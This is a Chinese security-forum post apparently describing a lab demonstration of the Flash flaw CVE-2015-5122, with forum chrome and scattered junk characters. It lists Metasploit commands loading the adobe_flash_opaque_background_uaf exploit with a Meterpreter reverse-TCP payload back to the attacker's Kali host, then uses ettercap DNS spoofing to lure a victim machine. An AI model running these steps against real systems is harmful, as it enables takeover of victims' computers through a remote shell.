找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1354|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

_4 S' n1 p& [$ [0 f0 W 二、cve2015-5122漏洞实例演示虚拟机 % ~% h1 V6 x5 ~3 v

# G, w+ W/ [0 N) i' T% Y

) Z/ h* O9 l3 o   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: . l4 p" S: `' H K9 a# S

) {. `- j2 h/ C) w; j4 C0 ~5 r

6 `5 _" y6 _/ Y& a search cve-2015-5122如图: 2 v8 y; `: T: {

6 F4 h2 ]1 Y6 W( s! D

3 v ~9 i% {) z$ y   ; ~1 l0 x1 g- v2 Y- M9 ]

, l% G/ h, r8 G& ~+ Q9 I5 u, p% C

N% Q/ n: @9 ~3 V3 i; Q5 X 下面我们敲如下命令: & H9 a* W$ A6 N5 w+ Y

" y: `- E9 x1 H# |8 B) I0 V% c

$ v3 {- g. [ `& W5 h7 z" c use exploit/multi/browser/adobe_flash_opaque_background_uaf + X; `$ x" \, y

7 f- e& Y/ k ~8 m( x0 m# d

% o: E1 ~: [2 L set PAYLOAD windows/meterpreter/reverse_tcp ! r: ]' O! k5 M) I

. t- S# _, p9 _' z. f

u! V* K: h- y set LHOST 192.168.0.109 6 }' q, z+ U; D) K4 b6 y

" m% u- G! I- Y' J$ f. e) F9 O) Q

; R6 b" G2 }8 [' | set URIPATH /                        /*根目录*/ + }$ f0 X' d6 M+ S, M) k7 K

; `9 D, @- c$ n

0 {2 b' X+ r$ F$ u' z: h1 _8 n) P5 a set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 " \0 c: m) F& J, Q/ {: z0 B

' \8 c. D+ R- B: Z% d# H

% B2 r5 V! |7 b& v set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 & L! e) j& p5 V, E9 q$ Q: I

( N/ [6 D& J5 M% E9 Y

3 G* {2 Z1 g1 K) z 然后show options如图: 8 c6 I$ d1 Y7 A# E$ P# d

+ p) j6 O+ {( a, ^

% E0 d& y& @: |# K   , r5 ^0 t* H. u! v

- }; H& Z6 E8 H5 v) l9 M0 Z

! O2 a8 i: Z; U 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
$ d$ j1 v4 z% d- R
6 a/ J- t* o1 w7 f! a* \% j: |$ _

6 J3 R& I, B7 D

' u- j! _7 y: @8 d0 [4 i 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 ( r. {* g# _4 R% f

" ]& J8 c2 k5 g

4 }: ]7 z+ R/ Q2 A+ ~) g Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf # W9 ?. J0 A9 a9 v. n% F8 ?2 v

8 R+ G6 t1 O8 p- D1 ^3 s6 e

6 b: B7 w+ t; j3 \9 N; W) K   0 P V9 d: m1 o' O, V3 C) Z9 S

; h2 k, x4 U9 A0 e: a+ y

" Y g0 n" X& h* ~+ x 成功了,这时候我们断开ettercap,如图: ( r w7 m6 K7 m2 W/ L. k# J

' O5 t5 Z" y2 C K

" K& F* {+ r ^" t( P   7 Y5 ?; _; `( |3 C* M$ ^

' @& ^) L/ F: @6 |+ t

* w8 A. k* f6 G. Q) \" U, b Screenshot如图: + }! x8 x, K0 }# M7 [$ D) g! O

$ O2 l% c. J+ I' \

) x4 y5 U6 C% x. @; R9 T% t8 m   ' u) F% a, U: I3 I

! L! ~9 q2 A4 |4 K l) M& V7 h

, f: |. t+ e, ]/ f2 n5 A : O4 ?/ ^, Z$ v9 E

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表